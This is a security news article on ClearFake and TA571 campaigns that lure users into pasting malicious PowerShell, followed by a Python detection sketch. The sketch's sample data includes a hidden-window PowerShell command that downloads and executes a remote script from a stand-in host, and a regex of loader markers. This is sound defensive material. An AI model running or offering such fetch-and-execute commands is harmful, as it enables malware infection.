Users at your organization may literally be copying and pasting malicious PowerShell scripts into their Windows terminals.
This seemingly farfetched scenario was described by Proofpoint researchers in a blog post Monday, with the authors describing two active campaigns to lure users into this drastic step.
“While we don’t have insight into how many of these attacks were successful, it is likely the threat actors are seeing a decent infection rate given that they keep using this technique,” Proofpoint Threat Researcher Selena Larson, who co-authored the blog post, told SC Media.
The first campaign was spotted in early March and attributed to initial access broker TA571, while the second campaign popped up in early April and has been tied to the “ClearFake” activity cluster. Both campaigns appeared to be ongoing at least as of early June.
ClearFake, TA571 abuse users’ trust in legitimate sites, programs
In both campaigns discovered by Proofpoint, the threat actors utilize prompts that claim an error has occurred and action is needed to continue browsing the website or file the target was trying to access. Said action involves copying code and pasting it into a Windows terminal to supposedly “install the root certificate” or “update the DNS cache.”
TA571 sent more than 100,000 spam emails to thousands of organizations over the past two months that include an HTML file resembling a Microsoft Word document or OneDrive file. The ClearFake campaign, on the other hand, sends out the phishing pop-ups from legitimate websites they have already compromised.
In either scenario, it is designed to appear to the end-user that the popup is coming from a trusted website or application. The legitimate websites used appeared to have been opportunistically compromised through vulnerabilities, such as vulnerable plugins, and included high traffic media sites and websites of small- and medium-sized businesses in addition to more obscure, low traffic sites, according to Larson.
Clicking one button on the prompt copies a malicious PowerShell script to the user’s clipboard, and following the prompt’s instructions to open the Windows PowerShell terminal and right-click causes the script to be pasted and executed before the user can review it. Some versions of the campaign used the Windows Run dialog instead, which required fewer user steps but let the user see the contents of the script before running it.
“It’s extremely important for organizations to train users on new and evolving threats across the landscape and ensure defense in depth – like flagging on non-administrative users executing PowerShell – to prevent exploitation at multiple steps in the attack chain,” Larson said.
PowerShell scripts install infostealers, backdoors
The PowerShell script copied from the ClearFake campaign popups was found to lead to infostealers including Lumma Stealer and Vidar Stealer, as well as cryptominers and a clipboard hijacker that replaces copied cryptocurrency addresses with the threat actor’s own address. In some cases, up to five distinct malware families were ultimately executed as a result of running one script.
The ClearFake malware avoids detection not only by having the script manually executed in the PowerShell terminal by the user, but also by doing checks for system temperature to avoid virtual machines and sandboxes, and by leveraging long nested attack chains that load content from various places and with various forms of obfuscation.
Final payloads for the TA571 campaign included DarkGate and NetSupport RAT, creating a backdoor that can be utilized by other cybercriminals who purchase initial access from TA571. Proofpoint said it has “high confidence” that infection by TA571 could ultimately facilitate ransomware attacks.
Despite the similarities between the campaigns, the Proofpoint researchers said they do not believe TA571 to be directly associated with the ClearFake activity cluster.
Proofpoint emphasized that the best defense against these attacks is for the attack chain to be stopped before the PowerShell is ever pasted.
“Organizations should train users to identify activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program,” the blog post concluded.
Larson also noted that restricting non-administrative users from executing PowerShell can mitigate the risk.
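As an added example (not code from Proofpoint, SC Media or the article), the following Python sketches the detection Larson suggests: flag every PowerShell launch by a non-administrative user, and weight it further when the launch path matches the lure (a console started under explorer.exe via the Run dialog or Start menu) or the command line carries loader markers. The record fields, the explorer.exe parent heuristic and the marker regex are assumptions, and the sample records are constructed.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcCreate:
    """Process-creation record (assumed shape, loosely after Windows event
    4688 / Sysmon event 1; admin membership is resolved upstream)."""
    user: str
    is_admin: bool
    parent: str   # parent process image name
    image: str    # new process image name
    cmdline: str

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Opening PowerShell via the Run dialog or Start menu, as the lure instructs,
# yields a console parented by explorer.exe; the pasted script runs inside it.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Generic loader/obfuscation markers (assumed heuristics, not from the article).
SUSPICIOUS = re.compile(
    r"-e(c|nc|ncodedcommand)?\b|\biex\b|invoke-expression|downloadstring|"
    r"frombase64string|-w(indowstyle)?\s+hidden", re.I)

def reasons_for(ev):
    """Why a record deserves an alert (empty = ignore): every non-admin
    PowerShell launch is flagged, as Larson recommends; extras add weight."""
    if ev.image.lower() not in POWERSHELL or ev.is_admin:
        return []
    reasons = ["non-admin user launched PowerShell"]
    if ev.parent.lower() in INTERACTIVE_PARENTS:
        reasons.append("launched interactively under explorer.exe")
    if SUSPICIOUS.search(ev.cmdline):
        reasons.append("loader/obfuscation marker in command line")
    return reasons

def triage(events):
    """(user, severity, reasons) for each record that should alert."""
    scored = [(ev.user, reasons_for(ev)) for ev in events]
    return [(u, "high" if len(r) == 3 else "medium", r) for u, r in scored if r]

# Constructed sample records, not real telemetry.
EVENTS = [
    ProcCreate("alice", False, "explorer.exe", "powershell.exe",
               "powershell.exe -w hidden -c \"iex ((New-Object Net.WebClient)"
               ".DownloadString('http://example.invalid/p'))\""),
    ProcCreate("bob", True, "cmd.exe", "powershell.exe",
               r"powershell.exe -File C:\scripts\inventory.ps1"),
    ProcCreate("carol", False, "explorer.exe", "notepad.exe", "notepad.exe"),
    ProcCreate("dave", False, "explorer.exe", "powershell.exe", "powershell.exe"),
]
```

On the sample records, `triage(EVENTS)` flags alice as high (all three indicators) and dave as medium (a plain interactive launch by a non-admin), while bob's admin-run script and carol's notepad launch are ignored.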